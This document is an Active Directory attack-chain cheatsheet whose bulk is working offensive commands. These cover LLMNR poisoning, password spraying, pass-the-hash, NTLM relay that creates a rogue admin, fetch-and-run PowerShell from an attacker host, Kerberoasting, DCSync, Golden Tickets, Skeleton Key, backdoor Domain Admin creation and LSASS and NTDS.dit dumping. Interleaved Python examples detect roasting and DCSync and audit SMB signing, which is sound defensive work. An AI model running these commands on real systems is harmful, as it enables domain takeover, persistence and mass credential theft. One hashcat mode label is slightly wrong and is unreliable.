Active Directory Full Attack Chain
Overview
1. Recon
2. Initial Access
3. AD Enumeration
4. Lateral Movement
5. Privilege Escalation
6. Domain Compromise
Credentials

At a glance: 6 attack phases, 40+ techniques, 20+ tools, end goal: Domain Admin (DA).

Phase flow:
01 Network Recon
02 Initial Access
03 AD Enumeration
04 Cred Dumping
05 Lateral Movement
06 Priv Escalation
07 Domain Admin

Key Tools by Phase
RECON (Discovery Tools): nmap, masscan, crackmapexec, nbtscan, enum4linux, ldapsearch, BloodHound
EXPLOIT (Initial Access Tools): responder, evil-winrm, psexec.py, smbclient, hydra, metasploit
CREDS (Credential Tools): mimikatz, secretsdump, hashcat, john, kerbrute, GetNPUsers.py
PRIVESC (AD Attack Tools): BloodHound, PowerView, SharpHound, Rubeus, impacket, PowerSploit

Common Attack Paths
PATH A: LLMNR Poisoning → NTLMv2 Crack → SMB Access → BloodHound → DCSync
PATH B: Kerberoasting → Ticket Crack → Lateral Movement → DA Group Add
PATH C: AS-REP Roasting → Hash Crack → Pass-the-Hash → secretsdump → Golden Ticket
PATH D: Anonymous LDAP → Misconfig Enum → ACL Abuse (GenericWrite/ForceChangePassword) → DA
Network Scanning
SCAN: Host Discovery

Identify live hosts on the network before deep scanning.

# Ping sweep
nmap -sn 192.168.1.0/24

# ARP scan (faster on LAN)
netdiscover -r 192.168.1.0/24

# Masscan for large ranges
masscan 192.168.1.0/24 -p80,443,445,3389 --rate 1000

SCAN: AD Port & Service Scan

Key AD ports: 53 (DNS), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389/636 (LDAP), 3268 (GC), 3389 (RDP), 5985 (WinRM).

# Full AD port scan with scripts
nmap -sC -sV -p 53,88,135,139,389,445,636,3268,3389,5985,9389 -oN ad_scan.txt TARGET_IP

# Full port scan, then script scan the open ports
nmap -p- --min-rate 5000 TARGET_IP -oN allports.txt

Quick reference: 88 = Kerberos, 389 = LDAP, 445 = SMB, 5985 = WinRM, 3389 = RDP
SMB & NetBIOS Enumeration
SMB: SMB Enumeration
# Null session check
smbclient -N -L //TARGET_IP

# CME SMB enum (null auth)
crackmapexec smb TARGET_IP -u '' -p '' --shares

# enum4linux full scan
enum4linux -a TARGET_IP

# nbtscan for NetBIOS names
nbtscan 192.168.1.0/24

# Spider shares for interesting files
crackmapexec smb TARGET_IP -u USER -p PASS -M spider_plus

LDAP: LDAP Enumeration
# Anonymous LDAP bind
ldapsearch -x -H ldap://TARGET_IP -b "DC=domain,DC=local"

# Get all users (authenticated)
ldapsearch -x -H ldap://TARGET_IP -b "DC=domain,DC=local" -D "user@domain.local" -w PASSWORD "(objectclass=person)"

# windapsearch (cleaner output)
windapsearch -d domain.local --dc-ip DC_IP -u user@domain.local -p PASS --da
DNS Enumeration
DNS: DNS Recon & Zone Transfer
# Zone transfer attempt
dig axfr @DC_IP domain.local

# Bruteforce subdomains
gobuster dns -d domain.local -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -r DC_IP

# dnsrecon
dnsrecon -d domain.local -n DC_IP -t axfr
LLMNR / NBT-NS Poisoning
POISON: Responder — LLMNR/NBT-NS Poisoning

Intercept broadcast name resolution to capture NTLMv2 hashes from machines trying to resolve hostnames.

# Start responder on interface
responder -I eth0 -dwv

# Crack captured hash (NTLMv2)
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt

Hashes saved to: /usr/share/responder/logs/ — look for NTLMv2 entries
Requires being on the same network segment. Very noisy — avoid in stealth engagements.
Username Enumeration
KERBEROS: Kerbrute — Username Enumeration

Enumerate valid domain usernames via Kerberos pre-auth without triggering lockout.

# Enumerate users
kerbrute userenum --dc DC_IP -d domain.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

# Password spray (careful: lockout!)
kerbrute passwordspray --dc DC_IP -d domain.local users.txt Password123!

Password spraying: check lockout policy first. Default is 5 attempts / 30 min.
Remote Access
WINRM: Evil-WinRM — Remote Shell
# Connect with credentials
evil-winrm -i TARGET_IP -u Administrator -p Password123!

# Connect with NTLM hash (pass-the-hash)
evil-winrm -i TARGET_IP -u Administrator -H NTLM_HASH

# Upload / download files (inside the Evil-WinRM session)
upload /path/to/file.ps1
download C:\path\to\file

SMB: Impacket — psexec / smbexec / wmiexec
# psexec (SYSTEM shell, very noisy)
psexec.py domain.local/Administrator:Password@TARGET_IP

# wmiexec (semi-interactive, less noisy)
wmiexec.py domain.local/user:Password@TARGET_IP

# smbexec (no binary drop)
smbexec.py domain.local/user:Password@TARGET_IP

# Pass-the-hash with impacket
psexec.py -hashes :NTLM_HASH domain/Administrator@TARGET_IP

RDP: RDP Access — xfreerdp
# Basic RDP connection
xfreerdp /v:TARGET_IP /u:Administrator /p:Password123!

# With drive sharing and ignore cert
xfreerdp /v:TARGET_IP /u:USER /p:PASS /drive:share,/tmp /cert-ignore +clipboard

# Pass-the-hash via RDP (Restricted Admin mode required)
xfreerdp /v:TARGET_IP /u:Administrator /pth:NTLM_HASH /cert-ignore
BloodHound — Attack Path Mapping
BLOODHOUND: SharpHound Collection & BloodHound Analysis

BloodHound maps AD attack paths. SharpHound collects data; BloodHound visualizes it in Neo4j.

# Run SharpHound from target (PowerShell)
.\SharpHound.exe -c All

# bloodhound-python from Kali (remote)
bloodhound-python -u user -p Password -d domain.local -ns DC_IP -c All

# Start Neo4j, then BloodHound
sudo neo4j start
bloodhound &

Useful queries: "Find Shortest Paths to DA" · "Find AS-REP Roastable Users" · "Find Kerberoastable Users" · "Shortest Path from Owned Principals"
PowerView — Manual Enumeration
POWERVIEW: Domain Users, Groups & Computers
# Load PowerView (from disk, or in-memory from an attacker-hosted copy)
Import-Module .\PowerView.ps1
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/PowerView.ps1')

# Domain info
Get-Domain
Get-DomainController

# Enumerate users
Get-DomainUser | select samaccountname,description,memberof,pwdlastset
Get-DomainUser -SPN                  # Kerberoastable
Get-DomainUser -PreauthNotRequired   # AS-REP roastable

# Enumerate groups
Get-DomainGroupMember -Identity "Domain Admins"

# Local admin access (where can I go?)
Find-LocalAdminAccess

# Find where a user is logged in
Get-DomainUserLocation -UserIdentity administrator

ACL: ACL / Permission Enumeration

Find abusable ACLs: GenericAll, GenericWrite, WriteOwner, WriteDACL, ForceChangePassword.

# Find interesting ACLs for current user
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "currentuser"}

# Get ACL for a specific object
Get-DomainObjectAcl -Identity targetuser -ResolveGUIDs

# Check who has GenericAll on Domain Admins
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | ?{$_.ActiveDirectoryRights -match "GenericAll"}
CrackMapExec — Bulk Enumeration
CME: CrackMapExec — Everything
# Check creds across subnet
crackmapexec smb 192.168.1.0/24 -u user -p Password123!

# Dump logged in users
crackmapexec smb TARGET_IP -u user -p Pass --loggedon-users

# Dump SAM database
crackmapexec smb TARGET_IP -u Administrator -p Pass --sam

# Enum domain users via LDAP
crackmapexec ldap DC_IP -u user -p Pass --users

# Execute command on target
crackmapexec smb TARGET_IP -u Admin -p Pass -x "whoami"
Pass-the-Hash (PtH)
PTH: Pass-the-Hash — NTLM Auth

Use a captured NTLM hash to authenticate without knowing the plaintext password.

# psexec PtH
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:NTLM_HASH domain/Administrator@TARGET_IP

# evil-winrm PtH
evil-winrm -i TARGET_IP -u Administrator -H NTLM_HASH

# CME PtH spray across subnet
crackmapexec smb 192.168.1.0/24 -u Administrator -H NTLM_HASH --local-auth

Format for Impacket: LMHash:NTHash — use aad3b435b51404eeaad3b435b51404ee (the empty-LM value) as the LM placeholder if LM is empty
Pass-the-Ticket (PtT) / Kerberos
PTT: Pass-the-Ticket — Rubeus
# List current tickets
.\Rubeus.exe triage

# Dump TGT from memory
.\Rubeus.exe dump /service:krbtgt /nowrap

# Import ticket (Rubeus)
.\Rubeus.exe ptt /ticket:BASE64_TICKET

# Import ticket (Mimikatz)
kerberos::ptt ticket.kirbi

# Impacket PtT (Linux)
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass domain.local/user@TARGET
NTLM Relay Attack
RELAY: NTLM Relay — ntlmrelayx

When SMB signing is not required on the target, relay captured NTLM authentication to another host instead of cracking it.

# Find hosts without SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt

# Disable the SMB and HTTP servers in Responder.conf, then run both
responder -I eth0 -dwP
ntlmrelayx.py -tf relay_targets.txt -smb2support

# Relay to get interactive shell
ntlmrelayx.py -tf relay_targets.txt -smb2support -i

# Relay and execute command
ntlmrelayx.py -tf relay_targets.txt -smb2support -c "net user hacker P@ss123! /add && net localgroup administrators hacker /add"
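The relay list above is, from the defender's side, the remediation list: every host where signing is not required needs "Microsoft network server: Digitally sign communications (always)" enforced, and SMBv1 should be off for good measure. The following is an added example, not part of the cheatsheet or of CrackMapExec: it parses lines shaped like CME's SMB banner output ("(name:..) (domain:..) (signing:..) (SMBv1:..)") and splits them into the two fix lists. The sample lines, hostnames and addresses are constructed.

```python
"""Audit of SMB signing and SMBv1 from scanner banner lines.

Added example; the sample output below is constructed, not from a real scan.
"""
import re

# One CME-style SMB banner line: "SMB  <ip>  <port>  <host>  [*] <os> (name:..) (domain:..) (signing:..) (SMBv1:..)"
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\]\s+"
    r"(?P<os>.*?)\s+\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)

# Constructed sample output (hypothetical hosts).
SAMPLE_OUTPUT = """\
SMB         192.168.1.10    445    DC01             [*] Windows Server 2019 Standard 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.1.21    445    FILE01           [*] Windows Server 2016 Standard 14393 x64 (name:FILE01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         192.168.1.35    445    WS-ALICE         [*] Windows 10 Pro 19041 x64 (name:WS-ALICE) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.40    445    PRINT01          [*] Windows Server 2012 R2 Standard 9600 x64 (name:PRINT01) (domain:corp.local) (signing:True) (SMBv1:True)
"""


def parse_banner(line):
    """Return a dict for one banner line, or None if the line is not a banner."""
    m = BANNER_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["signing"] = d["signing"] == "True"
    d["smbv1"] = d["smbv1"] == "True"
    d["port"] = int(d["port"])
    return d


def audit_smb(text):
    """Split banner output into two remediation lists: hosts that do not require
    SMB signing (relayable) and hosts still offering SMBv1."""
    unsigned, smbv1 = [], []
    for line in text.splitlines():
        host = parse_banner(line)
        if host is None:
            continue   # progress lines, errors, anything that is not a banner
        if not host["signing"]:
            unsigned.append((host["ip"], host["name"]))
        if host["smbv1"]:
            smbv1.append((host["ip"], host["name"]))
    return {"signing_not_required": unsigned, "smbv1_enabled": smbv1}


if __name__ == "__main__":
    report = audit_smb(SAMPLE_OUTPUT)
    for ip, name in report["signing_not_required"]:
        print(f"{name} ({ip}): enforce SMB signing")
    for ip, name in report["smbv1_enabled"]:
        print(f"{name} ({ip}): disable SMBv1")
```

Domain controllers require signing by default, which is why DC01 is clean here and why relay targets are usually member servers and workstations; the same scan run after the GPO change should return an empty `signing_not_required` list.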
Token Impersonation
TOKEN: Token Impersonation — Incognito
# Meterpreter token impersonation
load incognito
list_tokens -u
impersonate_token "DOMAIN\\Administrator"

# PowerShell token steal (SeImpersonatePrivilege)
Invoke-TokenManipulation -ImpersonateUser -Username "domain\admin"
Kerberoasting
KERB: Kerberoasting — Service Account Hashes

Request TGS tickets for SPN accounts. Part of the ticket is encrypted with a key derived from the service account's password (its NTLM hash when RC4 is used), so it can be cracked offline.

# GetUserSPNs (Impacket)
GetUserSPNs.py domain.local/user:Password -dc-ip DC_IP -request

# Rubeus Kerberoast
.\Rubeus.exe kerberoast /nowrap

# PowerView
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File hashes.txt

# Crack TGS hash (mode 13100)
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

AS-REP Roasting
AS-REP: AS-REP Roasting — No Preauth Accounts

Users with "Do not require Kerberos preauthentication" set receive an AS-REP without proving anything first — grab it & crack it.

# GetNPUsers (Impacket) — with creds
GetNPUsers.py domain.local/user:Password -dc-ip DC_IP -request

# GetNPUsers — without creds (username list)
GetNPUsers.py domain.local/ -dc-ip DC_IP -usersfile users.txt -format hashcat

# Rubeus AS-REP roast
.\Rubeus.exe asreproast /nowrap

# Crack (mode 18200)
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt

Hashcat modes: -m 5600 = NTLMv2, -m 13100 = Kerberoast, -m 18200 = AS-REP, -m 1000 = NTLM
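Both roasting techniques above are visible to whoever reads the DC's Kerberos audit events, and the detection logic is short enough to show. This is an added example, not code from the cheatsheet or from any of the tools it lists. Kerberoasting appears as event 4769 (service ticket requested): one account pulling tickets for many distinct SPN accounts, typically with TicketEncryptionType 0x17 (RC4-HMAC) because the tools ask for RC4 so that the result cracks under mode 13100. AS-REP roasting appears as event 4768 (TGT requested) with Pre-Authentication Type 0, which identifies the accounts that have pre-auth disabled; those accounts are roastable no matter who sent the request, so the fix is on the account, not the requester. The sample events, account names and addresses are constructed; the event IDs, field meanings and encryption-type values are real.

```python
"""Detection of Kerberoasting and AS-REP roasting from DC Kerberos audit events.

Added example; the sample events below are constructed, not real log data.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

RC4_HMAC = 0x17   # TicketEncryptionType for RC4-HMAC (crackable with mode 13100 / 18200)
AES256 = 0x12     # TicketEncryptionType for AES256-CTS-HMAC-SHA1-96


@dataclass(frozen=True)
class TicketEvent:
    event_id: int                        # 4768 = AS-REQ (TGT), 4769 = TGS-REQ (service ticket)
    account: str                         # TargetUserName: who asked
    service: str                         # ServiceName: SPN owner (4769) or "krbtgt" (4768)
    etype: int                           # TicketEncryptionType
    client_ip: str                       # IpAddress
    preauth_type: Optional[int] = None   # 4768 only; 0 = no pre-authentication


# Constructed sample events (hypothetical accounts and hosts).
SAMPLE_EVENTS = [
    # jsmith requests RC4 service tickets for six different SPN accounts in a row
    *[TicketEvent(4769, "jsmith", svc, RC4_HMAC, "10.0.0.60")
      for svc in ("svc-sql", "svc-web", "svc-backup", "svc-sharepoint", "svc-exchange", "svc-ci")],
    # alice does normal work: AES tickets for a file server and one service
    TicketEvent(4769, "alice", "FILE01$", AES256, "10.0.0.12"),
    TicketEvent(4769, "alice", "svc-web", AES256, "10.0.0.12"),
    # alice's own TGT request with normal pre-auth (type 2 = PA-ENC-TIMESTAMP)
    TicketEvent(4768, "alice", "krbtgt", AES256, "10.0.0.12", preauth_type=2),
    # legacyapp has pre-auth disabled: an AS-REP roastable account
    TicketEvent(4768, "legacyapp", "krbtgt", RC4_HMAC, "10.0.0.60", preauth_type=0),
]


def detect_kerberoasting(events, min_services=5):
    """Map requesting account -> sorted SPN accounts, for requesters that pulled RC4
    service tickets for at least `min_services` distinct non-machine services."""
    services = defaultdict(set)
    for e in events:
        if e.event_id != 4769 or e.etype != RC4_HMAC:
            continue
        # machine accounts have random 120-char passwords and krbtgt is not a
        # service account: neither is the crackable target roasting goes after
        if e.service.endswith("$") or e.service.lower() == "krbtgt":
            continue
        services[e.account].add(e.service)
    return {acct: sorted(svcs) for acct, svcs in services.items() if len(svcs) >= min_services}


def detect_asrep_roastable(events):
    """Accounts seen requesting a TGT with Pre-Authentication Type 0. The AS-REP
    they receive carries material encrypted under the account's key, so each one
    is roastable by anyone who knows the username."""
    return sorted({e.account for e in events if e.event_id == 4768 and e.preauth_type == 0})


if __name__ == "__main__":
    print("kerberoasting:", detect_kerberoasting(SAMPLE_EVENTS))
    print("asrep roastable:", detect_asrep_roastable(SAMPLE_EVENTS))
```

The RC4 filter is the useful part: once a domain enforces AES for service accounts and sets long, random service-account passwords (or uses gMSAs), 0x17 tickets for SPN accounts mostly stop appearing, and the ones that do are worth a look. The AS-REP check is really an inventory of misconfigured accounts, the same set PowerView's `Get-DomainUser -PreauthNotRequired` returns from LDAP.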
ACL Abuse
ACL: ACL Abuse — GenericAll / GenericWrite / WriteDACL
# GenericAll on user → force password reset
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

# GenericAll on group → add yourself
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'youruser'

# WriteDACL → grant yourself DCSync rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity youruser -Rights DCSync

# GenericWrite on user → set SPN (then Kerberoast)
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/fake'}
SeImpersonate / Potato Attacks
POTATO: Potato Attacks — SeImpersonatePrivilege

If you have SeImpersonatePrivilege (common on service accounts, IIS, SQL), escalate to SYSTEM.

# Check privileges first
whoami /priv

# PrintSpoofer (Server 2019 / Win10)
.\PrintSpoofer.exe -i -c cmd

# GodPotato (universal)
.\GodPotato.exe -cmd "cmd /c whoami"

# JuicyPotato (older systems)
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c net user hacker P@ss /add" -t *
DCSync — Domain Hash Dump
DCSYNC: DCSync — Dump All Domain Hashes

Simulate DC replication to pull all password hashes from AD. Requires DA or DCSync ACL rights (GetChanges + GetChangesAll).

# secretsdump (Impacket) — remote
secretsdump.py domain.local/Administrator:Password@DC_IP

# secretsdump with hash (PtH)
secretsdump.py -hashes :NTLM_HASH domain/Administrator@DC_IP

# Mimikatz DCSync (on target)
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /all /csv

Grab: Administrator, krbtgt, and all DA accounts. krbtgt hash enables Golden Ticket attacks.
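Because DCSync is a replication request, it is audited on the DC as event 4662 (an operation was performed on an object) with the replication control-access rights in the Properties field, and those two rights the section above names (GetChanges + GetChangesAll) are exactly the ones to watch. This is an added example, not code from the cheatsheet, secretsdump or mimikatz. The GUIDs are the real schema values for DS-Replication-Get-Changes (1131f6aa-...), DS-Replication-Get-Changes-All (1131f6ad-...) and DS-Replication-Get-Changes-In-Filtered-Set (89e95b76-...); legitimate callers are the domain controllers themselves plus a short allowlist such as an Azure AD Connect sync account, so the rule is "replication right used by anyone else". The records, account names and the allowlist are constructed, and the DC list is passed in rather than inferred from a trailing `$`, since any computer account can be compromised.

```python
"""Detection of DCSync from directory-service access audits (event 4662).

Added example; the sample records below are constructed, not real log data.
"""
import re
from dataclasses import dataclass

# Control-access right GUIDs on the domain object that replication requires.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)


@dataclass(frozen=True)
class DcsyncFinding:
    account: str      # DOMAIN\user that exercised the right
    rights: tuple     # replication right names seen in the event
    full_dump: bool   # Get-Changes-All present: secrets (hashes), not just attributes


# Constructed sample 4662 records, keyed like the Windows event XML fields.
# The domainDNS object type GUID is real; the zero GUID is a placeholder for an
# unrelated property.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "MSOL_3f2a9c1b", "SubjectDomainName": "CORP",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {89e95b76-444d-4c62-991a-0facbeda640c}"},
    {"EventID": 4662, "SubjectUserName": "jsmith", "SubjectDomainName": "CORP",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "alice", "SubjectDomainName": "CORP",
     "Properties": "%%7688 {00000000-0000-0000-0000-000000000000}"},
    {"EventID": 4624, "SubjectUserName": "alice", "SubjectDomainName": "CORP", "Properties": ""},
]


def replication_rights(properties):
    """Return the replication right names present in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(properties) if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events, dc_accounts=(), allowlist=()):
    """Flag 4662 events in which an account other than a known DC or an
    allowlisted sync account exercised a replication right."""
    trusted = {a.lower() for a in dc_accounts} | {a.lower() for a in allowlist}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue   # ordinary object access, not replication
        who = ev["SubjectUserName"]
        if who.lower() in trusted:
            continue   # domain controller or approved sync account
        findings.append(DcsyncFinding(
            account=f"{ev['SubjectDomainName']}\\{who}",
            rights=tuple(rights),
            full_dump="DS-Replication-Get-Changes-All" in rights,
        ))
    return findings


if __name__ == "__main__":
    hits = detect_dcsync(SAMPLE_EVENTS, dc_accounts=("DC01$", "DC02$"), allowlist=("MSOL_3f2a9c1b",))
    for h in hits:
        print(f"{h.account} used {', '.join(h.rights)} (secrets: {h.full_dump})")
```

The event only exists if the "Audit Directory Service Access" subcategory is on and a SACL on the domain object audits these rights; without that there is nothing to parse. The allowlist should be tiny and reviewed: the WriteDACL line in the ACL Abuse section above is precisely how an attacker adds themselves to the set of principals that can do this.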
Golden Ticket Attack
GOLDEN: Golden Ticket — Forge TGT with krbtgt Hash

With the krbtgt hash, forge a TGT for any user — valid for 10 years. Full domain persistence.

# Get domain SID
Get-DomainSID    # PowerView
whoami /user     # or parse the domain SID from here

# Mimikatz Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:KRBTGT_HASH /ticket:golden.kirbi

# Use the ticket
kerberos::ptt golden.kirbi
dir \\DC\C$

# Rubeus Golden Ticket
.\Rubeus.exe golden /rc4:KRBTGT_HASH /domain:domain.local /sid:S-1-5-21-... /user:Administrator /ptt

Silver Ticket Attack
SILVER: Silver Ticket — Forge TGS for Specific Service

With a service account NTLM hash, forge a TGS for that service. More stealthy than Golden Ticket — no DC contact needed.

# Mimikatz Silver Ticket (e.g., CIFS/SMB)
kerberos::golden /user:Administrator /domain:domain.local /sid:DOMAIN_SID /rc4:SERVICE_NTLM_HASH /target:server.domain.local /service:cifs /ptt
Domain Persistence
PERSIST: Domain Persistence Techniques
# Skeleton Key (in-memory patch — any user = "mimikatz" password)
misc::skeleton

# AdminSDHolder abuse — persist ACL on protected groups
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity youruser -Rights All

# Add user to Domain Admins
net group "Domain Admins" youruser /add /domain

# Create backdoor admin
net user backdoor P@ssw0rd! /add /domain
net group "Domain Admins" backdoor /add /domain
NTDS.dit Extraction
NTDS: NTDS.dit Offline Extraction

If you have DA access to the DC, extract NTDS.dit directly for offline hash extraction.

# ntdsutil method
ntdsutil "activate instance ntds" "ifm" "create full C:\temp\ntds" quit quit

# VSS shadow copy method (NTDS.dit plus the SYSTEM hive that holds its boot key)
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp

# Extract hashes offline with secretsdump
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
Local Credential Dumping
MIMIKATZ: Mimikatz — LSASS Dump
# Dump plaintext creds from memory
privilege::debug
sekurlsa::logonpasswords

# Dump NTLM hashes only
sekurlsa::msv

# Dump Kerberos tickets
sekurlsa::tickets

# Dump SAM database
lsadump::sam

# Remote mimikatz via CME
crackmapexec smb TARGET_IP -u Admin -p Pass -M mimikatz

LSASS: LSASS Memory Dump — Offline Analysis
# ProcDump (Sysinternals)
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# comsvcs.dll method (no extra tools)
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump LSASS_PID C:\temp\lsass.dmp full

# Parse dump offline with pypykatz
pypykatz lsa minidump lsass.dmp

# Or with mimikatz offline
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Credential Hunting
HUNT: Credential Hunting — Files & Registry
# Search for password strings in files
findstr /si password *.txt *.xml *.ini *.config *.ps1 *.bat

# Windows autologin creds in registry (key path contains a space, so quote it)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# GPP (Group Policy Preferences) cpassword: find it in SYSVOL, then decrypt
findstr /S /I cpassword \\DC\SYSVOL\*.xml
gpp-decrypt ENCRYPTED_CPASSWORD

# PowerShell command history
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Check Windows Credential Manager
cmdkey /list
.\mimikatz.exe "vault::list"
Hash Cracking Reference
CRACK: Hashcat — Mode Reference & Rules
Modes: 1000 = NTLM, 5600 = NTLMv2, 13100 = Kerberoast, 18200 = AS-REP, 7500 = KRB5 TGS
# Rockyou wordlist attack
hashcat -m MODE hash.txt /usr/share/wordlists/rockyou.txt

# With best64 rule
hashcat -m MODE hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --format=NT hash.txt

# Identify hash type
hashid HASH
hash-identifier